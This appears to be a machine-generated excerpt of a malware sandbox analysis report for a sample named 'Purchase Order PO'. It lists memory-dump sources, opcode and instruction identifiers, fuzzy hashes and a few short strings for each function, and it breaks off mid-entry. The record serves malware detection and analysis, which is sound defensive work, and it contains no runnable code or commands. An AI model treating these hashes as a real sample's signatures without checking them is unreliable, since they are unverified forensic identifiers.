                                                                                                                            • API String ID: 0-671973202
                                                                                                                            • Opcode ID: 1178af6b583214e7e3b91a6330d7ae0b5316d8b5ffd82a01501d37e896dad83f
                                                                                                                            • Instruction ID: ce45a0a377e00c206b233d61b0d773f6477774d7053c81baeea85d6091eda1c5
                                                                                                                            • Opcode Fuzzy Hash: 1178af6b583214e7e3b91a6330d7ae0b5316d8b5ffd82a01501d37e896dad83f
                                                                                                                            • Instruction Fuzzy Hash: D351B131B002058FCB14EF79D8889AEBBF7FFC4224B25896AE555DB351EE309D0587A0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 8bq
                                                                                                                            • API String ID: 0-187764589
                                                                                                                            • Opcode ID: 0268ab2e62219eba5bb5b0412a827255206b038d65a94c7e1886d6fd177bdbe6
                                                                                                                            • Instruction ID: 0e60004b5c79607a22851f70aa8039cb77dc6b6592275fd192d01f53db1e1e54
                                                                                                                            • Opcode Fuzzy Hash: 0268ab2e62219eba5bb5b0412a827255206b038d65a94c7e1886d6fd177bdbe6
                                                                                                                            • Instruction Fuzzy Hash: A941F774E151089FCB04DFA9E9859EEBBB2FB89304F10842AE919A7354DB319D52CB50
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 8bq
                                                                                                                            • API String ID: 0-187764589
                                                                                                                            • Opcode ID: 2b3a6a6e049d95fb1162774cbc26876077f5234550f0041d761d034c023f911b
                                                                                                                            • Instruction ID: c2fdc7b7bebaa518211363365671593804d5eb9ecf4f722dade403cfd514a1f4
                                                                                                                            • Opcode Fuzzy Hash: 2b3a6a6e049d95fb1162774cbc26876077f5234550f0041d761d034c023f911b
                                                                                                                            • Instruction Fuzzy Hash: 65412974E04108AFCB04DFA9D895AAEBBB2FF89304F14842AE919E7350DB319D52CF50
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Te^q
                                                                                                                            • API String ID: 0-671973202
                                                                                                                            • Opcode ID: adf9c85a44000ccf9aa17a575c4fd80662c9d2d62d88a9db80d2443777bd32f3
                                                                                                                            • Instruction ID: e30cab2177a4a78e8871ad1f6dd6f29bb6353b3c9e67f999f4a6ae2b6eaab903
                                                                                                                            • Opcode Fuzzy Hash: adf9c85a44000ccf9aa17a575c4fd80662c9d2d62d88a9db80d2443777bd32f3
                                                                                                                            • Instruction Fuzzy Hash: 7F117071F0020E8BCB14EBB999405EEB6F7BF98214B51416BC549EB304EB35DD16C7A1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Te^q
                                                                                                                            • API String ID: 0-671973202
                                                                                                                            • Opcode ID: b10047b1285ee71f5d33973a00f349b765a7c29209539985ef212e90189b87f3
                                                                                                                            • Instruction ID: b54a0a69ef39f780bb6e738fdd3a08aa79006c83cf5c04766a5d500520fd92da
                                                                                                                            • Opcode Fuzzy Hash: b10047b1285ee71f5d33973a00f349b765a7c29209539985ef212e90189b87f3
                                                                                                                            • Instruction Fuzzy Hash: 87115E31B0020E8BCB44EBB999005EEB6F3BB98214B10407AC509EB244EB319E06CBA1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 7
                                                                                                                            • API String ID: 0-1790921346
                                                                                                                            • Opcode ID: 1ef45c4bb58fa3c016b12950a8ddf894223895a2ee580291631f77ec3a9ec2eb
                                                                                                                            • Instruction ID: 6d664e5319d52049b3e165bca5f3df4e690dd7e9cddde8b3a7192d867583df7d
                                                                                                                            • Opcode Fuzzy Hash: 1ef45c4bb58fa3c016b12950a8ddf894223895a2ee580291631f77ec3a9ec2eb
                                                                                                                            • Instruction Fuzzy Hash: D9E0C270A1D20CDBCB18EFF4E505AACBBB8EF05304F014596D50593260DA304E99DB81
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 6
                                                                                                                            • API String ID: 0-498629140
                                                                                                                            • Opcode ID: e88344bf99cea7c38dbb18a9a4ee280ab553d11c09d13401188470e136c1260c
                                                                                                                            • Instruction ID: 6adaf850ca23291f7341a47c74502a6c8d66997b2f981a76d210e95eb2b1249b
                                                                                                                            • Opcode Fuzzy Hash: e88344bf99cea7c38dbb18a9a4ee280ab553d11c09d13401188470e136c1260c
                                                                                                                            • Instruction Fuzzy Hash: D8E0C231949208DBEB10DFF4E5096ADBFF9EB05301F11819BE40697240EF319A48CB82
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c1d7370ca2110a06e56e9a96c1afe33d6166acd0db8f8dd0ee0835ae7f6b26f4
                                                                                                                            • Instruction ID: caee8d7732fc3905dea5c0a61ea46943aa7fd4443be08239671a68438319fc34
                                                                                                                            • Opcode Fuzzy Hash: c1d7370ca2110a06e56e9a96c1afe33d6166acd0db8f8dd0ee0835ae7f6b26f4
                                                                                                                            • Instruction Fuzzy Hash: 9BF10C75A04615DFCB14CF68D588AADBBF6FF88310F16806AE519AB361DB70EC41CB90
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3df363234458849f70b839177919f34f32bdf12bfc3389fce593fd93769a0417
                                                                                                                            • Instruction ID: 9bc2199f3d0ebe0e23f61502785472bb3ade292ad3725c3e54942481c8396a38
                                                                                                                            • Opcode Fuzzy Hash: 3df363234458849f70b839177919f34f32bdf12bfc3389fce593fd93769a0417
                                                                                                                            • Instruction Fuzzy Hash: 6371F234704245CFCB14DF28C898A6A7BEAFF49640F1A41AAEA56CB7A1DB70DC41CB51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6bcbdfaddecd1a3a0634286d5154fc19ef0647b0c067eaaab933578a2d7d1599
                                                                                                                            • Instruction ID: d7f38da249492dfc705b217efea2ccb066a91932e478836f7ffea3441ed679c3
                                                                                                                            • Opcode Fuzzy Hash: 6bcbdfaddecd1a3a0634286d5154fc19ef0647b0c067eaaab933578a2d7d1599
                                                                                                                            • Instruction Fuzzy Hash: 06818278E04219DFCF51CFA8C880AAEBBB6FF49314F118466D919EB211D731AA46CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ae046685f3d4ca32a7c007665a50113e23cc420522ab11f6cf4f7652df72f6f9
                                                                                                                            • Instruction ID: fea71ab4580e06c032e108a4c616ef39fe88c202b8f52ac780c8d793fd788f32
                                                                                                                            • Opcode Fuzzy Hash: ae046685f3d4ca32a7c007665a50113e23cc420522ab11f6cf4f7652df72f6f9
                                                                                                                            • Instruction Fuzzy Hash: 4661B175E116099FDB04CFA9D884AAEBBF2FF49310F118826E915E7250EB30D981CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 386e641c6262505785176ed6454b396d1521806629c21ed8c04de39163076c11
                                                                                                                            • Instruction ID: fb9d3d2dc76db7cdced7de5d8ba66375ee65202905cdfa3cdb3fc307d3d5ba02
                                                                                                                            • Opcode Fuzzy Hash: 386e641c6262505785176ed6454b396d1521806629c21ed8c04de39163076c11
                                                                                                                            • Instruction Fuzzy Hash: A2612A74A00219CFCB44EFA8E5849EEBBB2FF49301F108569E956AB364CF315909CF60
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 32c0335ac089ad6443726e8ce3ed3771c8e783335d505e7d9055410825e2ec34
                                                                                                                            • Instruction ID: d061154f416c2121d4ffcd1633658e6fb5cdeb6e65a50ba2be45bc54e70dbfbe
                                                                                                                            • Opcode Fuzzy Hash: 32c0335ac089ad6443726e8ce3ed3771c8e783335d505e7d9055410825e2ec34
                                                                                                                            • Instruction Fuzzy Hash: AB614C70E047498FDB16CFA5C950BADBBF2BF89304F25861AE949AB341D770A985CF40
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a5aed54cdaf8ab87679f5840978b580c2abec45ecd6f095c2ef036195e32ad78
                                                                                                                            • Instruction ID: bfea4888f2e518c27201bdbb70ab8a9a5cd30590de61621ea09b7c3d6191b1f1
                                                                                                                            • Opcode Fuzzy Hash: a5aed54cdaf8ab87679f5840978b580c2abec45ecd6f095c2ef036195e32ad78
                                                                                                                            • Instruction Fuzzy Hash: 2E611974A01219DFCB44EFA8E9849EEBBB2FF49301F108569E915AB364DF315909CB60
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a20d03e85762e60c63bf37e5c30d9733b6f3f75eacb6d56380454e92e1015b78
                                                                                                                            • Instruction ID: 91971c9ae511e76ba9e0645c68d6a4135c4fd272603fc72d8603d5e1690c41f6
                                                                                                                            • Opcode Fuzzy Hash: a20d03e85762e60c63bf37e5c30d9733b6f3f75eacb6d56380454e92e1015b78
                                                                                                                            • Instruction Fuzzy Hash: 1041B4313042449FCB05DF69E855A6E7BE6EF85310F1980A9F54ACB3A1DE31DC0287A4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5ae5dfbc4b5020e4324e9f5327c49c1a86f5ef109cf326bd140be9dde5d3bd83
                                                                                                                            • Instruction ID: ac7a9d228a3292851baf19497e795ca81e9e4deb531aa49f6d4e0e7c1f302d57
                                                                                                                            • Opcode Fuzzy Hash: 5ae5dfbc4b5020e4324e9f5327c49c1a86f5ef109cf326bd140be9dde5d3bd83
                                                                                                                            • Instruction Fuzzy Hash: A7513871E047498BCF16CFA5C950AADBBF2BF89304F25861AE949AB341D770A985CF00
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1d52b3ea06427f3e8af445c7d191417514d2605938a39d97a982cc50aaf50453
                                                                                                                            • Instruction ID: 8c770696f028216ff24d010af4a27308fbd847bb59d3fd1a056bb6284f5d53a3
                                                                                                                            • Opcode Fuzzy Hash: 1d52b3ea06427f3e8af445c7d191417514d2605938a39d97a982cc50aaf50453
                                                                                                                            • Instruction Fuzzy Hash: BA415A70E1938A8FDB02CFB9D8595AEBFF5AF4A201F05846BE541E7291EB348844CB50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: fc599fffeadfd0f498beacc6b3bbb743583c2fe86f01a6439ed93f4a8f08f44c
                                                                                                                            • Instruction ID: 09bdbc76ffcc43ad9c76571cf8a8f855bd930c6aeed580c44c7b1cee5a586706
                                                                                                                            • Opcode Fuzzy Hash: fc599fffeadfd0f498beacc6b3bbb743583c2fe86f01a6439ed93f4a8f08f44c
                                                                                                                            • Instruction Fuzzy Hash: 7F41E332A04249DFCF11CFA8C845AAEBFB2FF49310F058152EA55AB291D731E951DB62
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b1dd4a607ac3262ab0e92b6516805967a88f2ccce4bea75a238d922cca8afd79
                                                                                                                            • Instruction ID: ad84a877e95e633d4c3b041cd8eb1a8199dd3c6c0f042d065fa48eb8e1e154d0
                                                                                                                            • Opcode Fuzzy Hash: b1dd4a607ac3262ab0e92b6516805967a88f2ccce4bea75a238d922cca8afd79
                                                                                                                            • Instruction Fuzzy Hash: 6141C574E1920A9FDB04DFB9D8495AEBBF9BF4A301F119426E916E7240EB30D941CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a828c861e68e83f550735e0e2df9bb4d5cf7a9ec7a9fd664e7378ddf63383c47
                                                                                                                            • Instruction ID: 103c8be83363ddaa6c1d524ac03ca1d4aed760e14db62ec3b959422a1977180f
                                                                                                                            • Opcode Fuzzy Hash: a828c861e68e83f550735e0e2df9bb4d5cf7a9ec7a9fd664e7378ddf63383c47
                                                                                                                            • Instruction Fuzzy Hash: 50317031204109AFCF059FA8E855AAF7BB6FB88354F014025FA098B395CF35CD61CBA0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: fa8c99e0b81dffa50187d75584f9515fee972f516b3a7b2b210c0a16a1598f3f
                                                                                                                            • Instruction ID: 1f37ef5a80f69ebc988e660c68f46ccf8121ef5473ff28b9f36222a37f48cd2c
                                                                                                                            • Opcode Fuzzy Hash: fa8c99e0b81dffa50187d75584f9515fee972f516b3a7b2b210c0a16a1598f3f
                                                                                                                            • Instruction Fuzzy Hash: CD315976A002099FCB10DFA9D884A9EBFF9EF49310F10846AE909E7310D731A944CFA5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: cde30eab4a507cc3f31393e94b05e20c48bc127e60cb97eebdfd52db6cd09c5a
                                                                                                                            • Instruction ID: 57725f862ab379e4b0a2b6f4c05bde236dc1b8fcf69d2d1a769e27d2e15e732f
                                                                                                                            • Opcode Fuzzy Hash: cde30eab4a507cc3f31393e94b05e20c48bc127e60cb97eebdfd52db6cd09c5a
                                                                                                                            • Instruction Fuzzy Hash: 3021D7313042044BDB155A36D854B3E7ADBBFC475AF15407AD606CBB94EE26CC42D385
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d43ce98060f63e33dc04c887e09b8d339528a7b1fc972e5223a5a5ab6fb0afa1
                                                                                                                            • Instruction ID: 5808085e8c913f9a262cfa04c6de6a91eb29b33a5e14a70a4c70dd56098098bc
                                                                                                                            • Opcode Fuzzy Hash: d43ce98060f63e33dc04c887e09b8d339528a7b1fc972e5223a5a5ab6fb0afa1
                                                                                                                            • Instruction Fuzzy Hash: DD21F2723042014BDB155B35D8A8B3D7AEBBFC478AF0A407AD606CBB95EE25CC42D385
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 31444779988675862bf82b0bb8731ec9d221572f4ea57816bf77805e6e14894e
                                                                                                                            • Instruction ID: fd045685e0388398bb112f8cfaf6652da84b2fefd7614ee38037c29af665c37f
                                                                                                                            • Opcode Fuzzy Hash: 31444779988675862bf82b0bb8731ec9d221572f4ea57816bf77805e6e14894e
                                                                                                                            • Instruction Fuzzy Hash: C1313271E041199FCB04CF68C884AAEB7F6FF84320B158156E519AB3A5CB34ED41CBA0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c7d75a4cc71b0fd09a7a548499766dbe9e7d233fc9bd80c541ff06ef051ffa3f
                                                                                                                            • Instruction ID: 5d27b25f2ccb84e7f4cd01b93949b76ab0ee22af6de1b3503cd01cd170a84e69
                                                                                                                            • Opcode Fuzzy Hash: c7d75a4cc71b0fd09a7a548499766dbe9e7d233fc9bd80c541ff06ef051ffa3f
                                                                                                                            • Instruction Fuzzy Hash: 9021D3312092545FCB019F68E895BAF3FB1EB45314F0500BAF945CB296CA74CD50C7A1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 16ecd7b92aea13fce113d9754cd76b5e290c7d9048b9f18e8edf9d793b668843
                                                                                                                            • Instruction ID: 3a2c62172b179577cccb185294a172b637fffd1f28796144171881bd7cd8d3ce
                                                                                                                            • Opcode Fuzzy Hash: 16ecd7b92aea13fce113d9754cd76b5e290c7d9048b9f18e8edf9d793b668843
                                                                                                                            • Instruction Fuzzy Hash: 92315DB4E1920E9FCB40CFA9D5456AEFBF5BF08210F15846AE915E7250E7349A50CFA0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b56e2b19061c170bbeb0d7e3e366a5ced04877f5df9361298b56a819b44fb882
                                                                                                                            • Instruction ID: eec11edea7df865d58e25baf68dd70248e2904fe9670c3ceef6d7aef75f0551c
                                                                                                                            • Opcode Fuzzy Hash: b56e2b19061c170bbeb0d7e3e366a5ced04877f5df9361298b56a819b44fb882
                                                                                                                            • Instruction Fuzzy Hash: 6931A2B4E1920E9FCB40CFA9C9446AEFBF1BF09210F15846AD914E7250E7349A50CFA1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 84c6224e9b68c63cedf8e568c35b2393afbbf052c056261eaba3d99b5794d315
                                                                                                                            • Instruction ID: 6eb1c4370a83f6f340c2f0e02305fe00c754e92916cb72a90f4b4fac32d49588
                                                                                                                            • Opcode Fuzzy Hash: 84c6224e9b68c63cedf8e568c35b2393afbbf052c056261eaba3d99b5794d315
                                                                                                                            • Instruction Fuzzy Hash: 3121D531304A119BCB159E69E464E2FB7A6FFC8761B06416AEA16CF754CF30DC0287D0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1740355301.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_dbd000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3e6117f0fe69a799ac673574c56359dec3854e56041103a8660258a662c20054
                                                                                                                            • Instruction ID: f622e8a7daf2e85d9ed5e480d27859bf6741b29bb283dc310117fd2d4664c491
                                                                                                                            • Opcode Fuzzy Hash: 3e6117f0fe69a799ac673574c56359dec3854e56041103a8660258a662c20054
                                                                                                                            • Instruction Fuzzy Hash: 51210175604200DFCB14EF24D9C4B66BFA6FB88314F24C5ADE84A4B296D33AD847CA71
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 209be377613e12ad6d97aa6051cfb8e98729c5a0587a3160fa65dc57cf2244db
                                                                                                                            • Instruction ID: aa88e9748e9ff88fb7fd0f806131b0990c5e257c948a6a797c57a8d2dd7efbe0
                                                                                                                            • Opcode Fuzzy Hash: 209be377613e12ad6d97aa6051cfb8e98729c5a0587a3160fa65dc57cf2244db
                                                                                                                            • Instruction Fuzzy Hash: 9A31E2B0D00218DBDB20DF99C988BCEBBF5EB08714F24846AE509BB250C7B59885CF95
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ce0ff26fe51150cca2cfef4c38fd72402ee1eda4e48970ecd59e04983bad1b70
                                                                                                                            • Instruction ID: c57b07af8d00f7ade38b581d9a026e0218d48a74b21dd6c72917f1a7b28d993a
                                                                                                                            • Opcode Fuzzy Hash: ce0ff26fe51150cca2cfef4c38fd72402ee1eda4e48970ecd59e04983bad1b70
                                                                                                                            • Instruction Fuzzy Hash: 4331E3B0D00218DFDB20DF99C588B8EBBF5BB08314F64806AE509BB250C7B59845CF95
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: edb0aa2156d4a423a8d1265edbd5c5c0ddb3975005cf9c79f46a6e809102ec6d
                                                                                                                            • Instruction ID: 7f80d4d34f01d9a534dd51641938c8607fef7f50b7a50cca9ecb0e06d56a727f
